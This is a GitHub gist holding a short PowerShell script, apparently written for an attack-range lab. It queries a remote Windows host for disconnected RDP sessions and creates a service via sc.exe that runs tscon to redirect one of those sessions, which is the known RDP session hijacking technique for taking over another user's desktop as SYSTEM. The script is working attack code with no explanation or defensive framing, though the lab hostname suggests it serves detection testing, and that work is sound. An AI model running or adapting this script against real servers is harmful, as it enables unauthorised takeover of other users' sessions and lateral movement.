Created
March 29, 2023 20:44
-
-
Save MHaggis/ee77aeba9d179e1677c9da60ba800fbb to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Remote host | |
| $remoteHost = "mswin-server.attackrange.local" | |
| # Get query user output from remote host | |
| $queryUserOutput = (quser /SERVER:$remoteHost) | |
| # Parse disconnected sessions | |
| $disconnectedSessionRegex = '^\s*(\S+)\s+(\d+)\s+.*\s+Disc\s+' | |
| $disconnectedSessions = @($queryUserOutput | Where-Object { $_ -match $disconnectedSessionRegex } | ForEach-Object { | |
| @{ | |
| UserName = $matches[1] | |
| SessionId = $matches[2] | |
| } | |
| }) | |
| # Generate a random session name | |
| $newSessionName = "newsession_" + (Get-Random -Minimum 1000 -Maximum 9999) | |
| # Create new session with disconnected session ID and destination ID on remote host | |
| if ($disconnectedSessions) { | |
| $disconnectedSession = $disconnectedSessions[0] | |
| $sessionId = $disconnectedSession.SessionId | |
| $destinationIdRegex = 'rdp-tcp#(\d+)' | |
| $destinationId = $queryUserOutput -match $destinationIdRegex | ForEach-Object { $matches[1] } | |
| $binPath = "cmd.exe /k tscon $sessionId /dest:rdp-tcp#$destinationId" | |
| sc.exe \\$remoteHost create $newSessionName binpath= $binPath | |
| Write-Host "Found disconnected session with ID $($disconnectedSession.SessionId) for user $($disconnectedSession.UserName). New session created with name '$newSessionName'." | |
| } else { | |
| Write-Host "No disconnected sessions found." | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment